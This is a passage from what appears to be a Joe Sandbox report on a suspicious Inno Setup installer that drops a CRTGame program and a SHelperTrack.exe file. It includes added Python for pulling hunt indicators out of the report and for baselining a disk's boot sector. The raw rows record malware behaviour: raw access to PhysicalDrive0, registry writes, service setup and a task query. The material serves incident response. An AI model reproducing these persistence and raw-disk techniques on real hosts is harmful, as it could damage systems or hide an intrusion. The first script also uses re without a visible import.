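from collections import OrderedDict

# Constructed sample: eight rows copied from this report's dropped-file,
# not-started and process-creation listings, in the raw export form where
# the source path is fused to the event label and a "Jump to ..." link
# label trails the row.
SAMPLE_ROWS = r"""
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-O51E5.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bass.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\crtgame.exeJump to dropped file
Source: C:\Users\user\Desktop\AGcC2uK0El.exeFile created: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpJump to dropped file
Source: C:\Program Files (x86)\CRTGame\crtgame.exeFile created: C:\ProgramData\SHelperTrack\SHelperTrack.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bass.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-O51E5.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /Query
"""

EVENTS = ("File created", "Dropped PE file which has not been started", "Process created")

# Source path, then the event label (optionally separated by "; " in a
# cleaned-up export), then the detail, then an optional link label.
ROW_RE = re.compile(
    r"^Source:\s*(?P<source>.+?)\s*;?\s*"
    r"(?P<event>" + "|".join(re.escape(e) for e in EVENTS) + r"):\s*"
    r"(?P<detail>.+?)\s*(?:Jump to (?:dropped file|behavior))?\s*$"
)

# Inno Setup stages every payload under a random is-XXXXX.tmp name and
# unpacks its own helper DLLs into a random is-XXXXX.tmp directory; those
# names change per run, so they are poor indicators.
INNO_STAGING = re.compile(r"\\is-[A-Za-z0-9]{5}\.tmp(?=\\|$)")


def parse_rows(text):
    """Turn report rows into dicts. The ' (copy)' marker Joe Sandbox appends to
    a renamed staging file is stripped so the path is the final on-disk name."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        detail = m["detail"]
        if detail.endswith(" (copy)"):
            detail = detail[: -len(" (copy)")]
        rows.append({"source": m["source"], "event": m["event"], "detail": detail})
    return rows


def dropped_pe_iocs(rows):
    """Map each dropped path to its dropper and whether the sandbox saw it run.

    Joe Sandbox reports every dropped file under 'File created' and lists
    separately the dropped PEs that were never started; a path in the first
    list but not the second was executed during the run. This assumes the
    not-started list is complete (a truncated report overstates what ran).
    """
    iocs = OrderedDict()
    for r in rows:
        if r["event"] == "File created":
            iocs[r["detail"]] = {
                "dropped_by": r["source"],
                "started": True,
                "volatile_name": bool(INNO_STAGING.search(r["detail"])),
            }
    for r in rows:
        if r["event"] == EVENTS[1] and r["detail"] in iocs:
            iocs[r["detail"]]["started"] = False
    return iocs


def hunt_list(rows):
    """Dropped PEs that both ran and live at a stable path: the first things
    to sweep other hosts for."""
    return [p for p, i in dropped_pe_iocs(rows).items()
            if i["started"] and not i["volatile_name"]]


def drop_chain(rows, path):
    """Walk 'File created' rows from a dropped path back to the original sample."""
    dropped_by = {r["detail"]: r["source"] for r in rows if r["event"] == "File created"}
    chain = [path]
    while chain[-1] in dropped_by and dropped_by[chain[-1]] not in chain:
        chain.append(dropped_by[chain[-1]])
    return chain[::-1]


def process_creations(rows):
    """Child process command lines, e.g. the schtasks.exe call in this report."""
    return [r["detail"] for r in rows if r["event"] == "Process created"]


if __name__ == "__main__":
    rows = parse_rows(SAMPLE_ROWS)
    for p in hunt_list(rows):
        print("hunt:", p, "<-", " <- ".join(drop_chain(rows, p)[:-1]))
    for cmd in process_creations(rows):
        print("spawned:", cmd)
```

On the sample rows the hunt list is crtgame.exe and SHelperTrack.exe, the two dropped PEs that ran from stable paths, and the chain for SHelperTrack.exe runs from the Desktop sample through the Inno temp executable and crtgame.exe. process_creations() surfaces the schtasks.exe call; note that the report shows only /Query, which enumerates tasks, so task creation is not evidenced by these rows.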

                  Boot Survival

Source: C:\Program Files (x86)\CRTGame\crtgame.exe; Code function: 5_2_00401A58 CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0
Source: C:\Program Files (x86)\CRTGame\crtgame.exe; Code function: 7_2_02C4F29C CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0
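The two crtgame.exe rows above show a handle to \\.\PhysicalDrive0 followed by DeviceIoControl. The chain lists no WriteFile or write IOCTL, so it is equally consistent with read-only device queries, but a responder still wants to prove that sector 0 of the suspect host is unchanged. Added example, not from the report or the sample: a Python baseline and diff of the MBR. The device path is the usual Windows name for the first disk and reading it needs an elevated prompt; the sample MBR bytes and the function names are constructed for the example and are not taken from the analysed disk.

```python
import hashlib
import struct

SECTOR_SIZE = 512
BOOT_SIGNATURE = b"\x55\xAA"

# Raw first disk on Windows; opening it requires administrator rights.
# Not opened anywhere in this example's test path.
DEFAULT_DEVICE = r"\\.\PhysicalDrive0"


def parse_mbr(sector):
    """Split a 512-byte MBR into the fields worth baselining.

    Layout: 440 bytes of boot code, 4-byte disk signature, 2 reserved bytes,
    four 16-byte partition entries, 0x55AA. A GPT disk shows a single
    protective entry of type 0xEE here and keeps its real table in LBA 1+.
    """
    if len(sector) != SECTOR_SIZE:
        raise ValueError("expected one %d-byte sector" % SECTOR_SIZE)
    if sector[510:512] != BOOT_SIGNATURE:
        raise ValueError("missing 0x55AA boot signature")
    partitions = []
    for i in range(4):
        off = 446 + 16 * i
        status, ptype = sector[off], sector[off + 4]
        lba_start, sectors = struct.unpack_from("<II", sector, off + 8)
        if ptype != 0:
            partitions.append({"index": i, "bootable": status == 0x80,
                               "type": ptype, "lba_start": lba_start,
                               "sectors": sectors})
    return {
        "boot_code_sha256": hashlib.sha256(sector[:440]).hexdigest(),
        "disk_signature": struct.unpack_from("<I", sector, 440)[0],
        "partitions": partitions,
    }


def read_mbr(device=DEFAULT_DEVICE):
    """Read sector 0 of a raw device; unbuffered so the read stays sector-aligned."""
    with open(device, "rb", buffering=0) as f:
        return f.read(SECTOR_SIZE)


def mbr_diff(baseline, current):
    """Names of top-level fields that differ between two parse_mbr() results."""
    return [k for k in baseline if baseline[k] != current[k]]


def build_sample_mbr(boot_code_prefix=b"\xEB\x63\x90"):
    """Constructed sample: one bootable NTFS-type partition starting at LBA 2048."""
    sector = bytearray(SECTOR_SIZE)
    sector[:len(boot_code_prefix)] = boot_code_prefix
    struct.pack_into("<I", sector, 440, 0x12345678)
    entry = 446
    sector[entry] = 0x80          # active
    sector[entry + 4] = 0x07      # NTFS/exFAT type byte
    struct.pack_into("<II", sector, entry + 8, 2048, 1048576)
    sector[510:512] = BOOT_SIGNATURE
    return bytes(sector)


if __name__ == "__main__":
    baseline = parse_mbr(build_sample_mbr())
    # Simulated tampering: the jump at the start of the boot code is patched,
    # partition table untouched, which is what a boot-code implant looks like.
    tampered = parse_mbr(build_sample_mbr(b"\xEB\x00\x90"))
    print("changed fields:", mbr_diff(baseline, tampered))
    # On the suspect host (Windows, elevated): mbr_diff(baseline, parse_mbr(read_mbr()))
```

Take the baseline from a known-good image of the same build, or from the host before the installer ran; a change confined to boot_code_sha256 with the partition table intact is the pattern to escalate, while a changed disk_signature alone is often just Windows rewriting it after an image restore.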
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /Query
Source: C:\Program Files (x86)\CRTGame\crtgame.exe; Code function: 5_2_004026EE GetModuleHandleA,GetModuleFileNameA,GetCommandLineW,CommandLineToArgvW,GetLocalTime,lstrcmpiW,CreateFileA,CloseHandle,ExitProcess,lstrcmpiW,lstrcmpiW,RegCreateKeyExA,GetTickCount,wsprintfA,RegSetValueExA,RegCloseKey,lstrcmpiW,RegCreateKeyExA,GetTickCount,wsprintfA,RegSetValueExA,RegCloseKey,SetEvent,CreateThread,WaitForSingleObject,ExitProcess,StartServiceCtrlDispatcherA
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Code function: 1_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Code function: 1_2_004241EC IsIconic,SetActiveWindow,SetFocus
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Code function: 1_2_004241A4 IsIconic,SetActiveWindow
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Code function: 1_2_00418394 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Code function: 1_2_0042286C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Code function: 1_2_004175A8 IsIconic,GetCapture
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Code function: 1_2_00417CDE IsIconic,SetWindowPos
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Code function: 1_2_00417CE0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Code function: 1_2_00481CB0 IsIconic,GetWindowLongA,ShowWindow,ShowWindow
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_0044AEAC LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_0044AEAC
Source: C:\Users\user\Desktop\AGcC2uK0El.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX (9 identical entries)
Source: C:\Program Files (x86)\CRTGame\crtgame.exe; Code function: 5_2_00401B54 LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary
Source: C:\Program Files (x86)\CRTGame\crtgame.exe; Code function: 7_2_02C4F3A0 LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary
Source: C:\Program Files (x86)\CRTGame\crtgame.exe; Window / User API: threadDelayed 2634
Source: C:\Program Files (x86)\CRTGame\crtgame.exe; Window / User API: threadDelayed 7327
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\daiso.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\basswma.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-RJL72.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassmidi.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\takdec.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\avfilter-9.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\lame_enc.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-RJI5O.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-5JD36.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-P33NB.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-ULG4P.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-8DLTN.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-J0EI4.tmp\_isetup\_iscrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-GN0SC.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\dsd2.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-H6A9P.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\d_writer.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-J0EI4.tmp\_isetup\_shfoldr.dll
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-9A8PJ.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-6ND5B.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-J56NG.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-CHRTV.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-PJQ9V.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-AMJ3K.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-MDQ87.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-ODQUV.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-OSQAA.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-2V0OO.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-HLDR5.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-UVN7O.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\avutil-58.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\sd.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-JORH4.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-PJ8MN.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\rg_ebur128.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassdsd.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-Q9IJU.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-M07BP.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bass_ofr.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-DG85B.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-IM6II.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\uchardet.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libmp4v2.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\7z.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libsox-3.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\uninstall\is-785C0.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libsoxr.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-UN741.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bass_fx.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassflac.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\dsd2pcmt.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-J0EI4.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\is-HP7BQ.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-O51E5.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-5QDBA.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-8JJ67.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-I5CC7.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-FBHNA.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-930UV.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-E5NVS.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-D10RQ.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\is-GSGD0.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-JISVL.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-LVBK5.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libwebp.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\basswv.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-EATSP.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\swresample-4.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\dstt.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-J0EI4.tmp\_isetup\_isdecmp.dll
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bass_aac.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-J0EI4.tmp\_isetup\_RegDLL.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\uninstall\unins000.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libFLAC_dynamic.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\basscd.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-6S6NV.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassalac.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bass.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\peak_scanner_plugin_c.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\OptimFROG.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-I1OEI.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\wavpackdll.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-4CPU3.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\tak_deco_lib.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libdtsdec.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-JU8A8.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-SJ07E.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\raw_decode_plugin_c.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\da.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libwinpthread-1.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bass_tta.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-LP9D8.tmp
